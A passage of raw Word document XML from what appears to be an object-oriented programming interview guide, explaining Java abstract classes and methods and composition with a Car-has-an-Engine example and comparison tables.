          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Used as a base class for inheritance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F875F0A" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95"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88"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>abstrac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Animal</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6755F57F" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95"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Abstract method (no implementation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B7F46F" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95"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abstrac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makeSound</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1729245D" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95"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2064B5B1" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95"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Concrete method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529AF9BA" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95"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ea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1E6B37C7" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95"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Animal is eating"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124793A7" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95"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5EF836A6" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735554FE" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00C55850">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BAA9A8C" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00C55850">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Abstract Method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF7B384" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Has no body (no implementation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAEB3CF" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Must be overridden by the first concrete subclass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1834D269" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Can only exist in abstract classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D78C130" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95"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88"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>abstrac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hap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5C982D5F" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95"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abstrac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double</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> calculateArea</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abstract method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551174AB" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95"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666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B5B830" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00C55850">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Key Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B67CAC6" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>If a class has even one abstract method, the class must be declared abstract</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DAF6C2" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Abstract classes can have constructors (called when subclass is instantiated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76392872" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Used to define common interface for subclasses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8058BD" w14:textId="75B09603" w:rsidR="00195703" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00195703">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="3B48DF70">
          <v:rect id="_x0000_i1315" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBEAC46" w14:textId="77777777" w:rsidR="00341D0C" w:rsidRPr="00CE4B95" w:rsidRDefault="00341D0C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="115" w:name="_Toc196307595"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Composition in Oops?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="115"/>
    </w:p>
    <w:p w14:paraId="0D232432" w14:textId="02CDFFBA" w:rsidR="009534B5" w:rsidRPr="00CE4B95" w:rsidRDefault="009534B5" w:rsidP="00302C47">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osition</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a design principle in Object-Oriented Programming where </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>one class contains a reference to another class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as a part of its fields, meaning "has-a" relationship.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183040D9"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allows </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>code reuse</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by building complex types from simpler components, and is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stronger than inheritance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in many cases because it promotes better flexibility and encapsulation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E347E88" w14:textId="77777777" w:rsidR="009534B5" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00302C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B54DE85">
          <v:rect id="_x0000_i1316" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE6D5A4" w14:textId="77777777" w:rsidR="009534B5" w:rsidRPr="00CE4B95" w:rsidRDefault="009534B5" w:rsidP="00302C47">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A Car has an Engine"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489EAAD3"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Engine {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0C4DFA"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start() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151823D3"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Engine started");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A230B60"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D7844C9"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9F37D81" w14:textId="77777777" w:rsidR="009534B5" w:rsidRPr="00CE4B95" w:rsidRDefault="009534B5" w:rsidP="00302C47">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D229753"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Car {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631446B5"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Engine engine = new Engine(); // Composition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE97BD3" w14:textId="77777777" w:rsidR="009534B5" w:rsidRPr="00CE4B95" w:rsidRDefault="009534B5" w:rsidP="00302C47">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="674020F8"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drive() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223DC9B3"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ngine.start(); // Delegation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376F9851"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ar is moving");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F332F6B"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9AF0D76"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BA44FCB" w14:textId="77777777" w:rsidR="009534B5" w:rsidRPr="00CE4B95" w:rsidRDefault="009534B5" w:rsidP="00302C47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59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ar has an Engine</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Composition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7995F62F" w14:textId="77777777" w:rsidR="009534B5" w:rsidRPr="00CE4B95" w:rsidRDefault="009534B5" w:rsidP="00302C47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59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r uses Engine to perform its functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0912684E" w14:textId="77777777" w:rsidR="009534B5" w:rsidRPr="00CE4B95" w:rsidRDefault="009534B5" w:rsidP="00302C47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59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Engine changes internally, Car is unaffected — this promotes loose coupling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22383C4C" w14:textId="77777777" w:rsidR="009534B5" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00302C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1E942B2">
          <v:rect id="_x0000_i1317" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="626DFFC8" w14:textId="78507A56" w:rsidR="009534B5" w:rsidRPr="00CE4B95" w:rsidRDefault="009534B5" w:rsidP="00302C47">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y use Composi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01"/>
        <w:gridCol w:w="5449"/>
      </w:tblGrid>
      <w:tr w:rsidR="00302C47" w:rsidRPr="00CE4B95" w14:paraId="3E09D8B1" w14:textId="77777777" w:rsidTr="009534B5">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30FA8322" w14:textId="77777777" w:rsidR="009534B5" w:rsidRPr="00CE4B95" w:rsidRDefault="009534B5" w:rsidP="00302C4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dvantage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15858346" w14:textId="77777777" w:rsidR="009534B5" w:rsidRPr="00CE4B95" w:rsidRDefault="009534B5" w:rsidP="00302C4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302C47" w:rsidRPr="00CE4B95" w14:paraId="3789908D" w14:textId="77777777" w:rsidTr="009534B5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1ACAC3FD"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de Reuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FCD7189"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use functionality by containing objects of other classes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00302C47" w:rsidRPr="00CE4B95" w14:paraId="1AE43081" w14:textId="77777777" w:rsidTr="009534B5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="337B4DC3"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lexibility</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C62F1D5"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re flexible than inheritance (change behavior at runtime)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00302C47" w:rsidRPr="00CE4B95" w14:paraId="54E19B73" w14:textId="77777777" w:rsidTr="009534B5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F257A36"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capsulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BCE500C"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Keeps internal implementation hidden and safe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00302C47" w:rsidRPr="00CE4B95" w14:paraId="4B8ACA35" w14:textId="77777777" w:rsidTr="009534B5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E15625E"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void Inheritance Pitfalls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="456B96F3"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events tight coupling and fragile base class problems</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="267C3C9B" w14:textId="77777777" w:rsidR="009534B5" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00302C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CB09135">
          <v:rect id="_x0000_i1318" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="072DC8A0" w14:textId="77777777" w:rsidR="009534B5" w:rsidRPr="00CE4B95" w:rsidRDefault="009534B5" w:rsidP="00302C47">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mposition vs Inherita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84"/>
        <w:gridCol w:w="2737"/>
        <w:gridCol w:w="2076"/>
      </w:tblGrid>
      <w:tr w:rsidR="00302C47" w:rsidRPr="00CE4B95" w14:paraId="786F84DB" w14:textId="77777777" w:rsidTr="009534B5">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02764C17" w14:textId="77777777" w:rsidR="009534B5" w:rsidRPr="00CE4B95" w:rsidRDefault="009534B5" w:rsidP="00302C4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0F51B70B" w14:textId="77777777" w:rsidR="009534B5" w:rsidRPr="00CE4B95" w:rsidRDefault="009534B5" w:rsidP="00302C4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position</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CE7ECAD" w14:textId="77777777" w:rsidR="009534B5" w:rsidRPr="00CE4B95" w:rsidRDefault="009534B5" w:rsidP="00302C4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heritance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00302C47" w:rsidRPr="00CE4B95" w14:paraId="2D719FFA" w14:textId="77777777" w:rsidTr="009534B5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6948C7DB"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lationship</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="282817F8"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a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="252C3ECA"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s-a</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00302C47" w:rsidRPr="00CE4B95" w14:paraId="3F3E1D46" w14:textId="77777777" w:rsidTr="009534B5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B13166E"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upling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26506749"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ose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75970F97"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ight</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00302C47" w:rsidRPr="00CE4B95" w14:paraId="6354D2BC" w14:textId="77777777" w:rsidTr="009534B5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CF5E55D"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lexibility</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="106CFFF3"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igh (can change component)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40A3B49D"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w</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00302C47" w:rsidRPr="00CE4B95" w14:paraId="29FACCD7" w14:textId="77777777" w:rsidTr="009534B5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48255F1F"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usability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
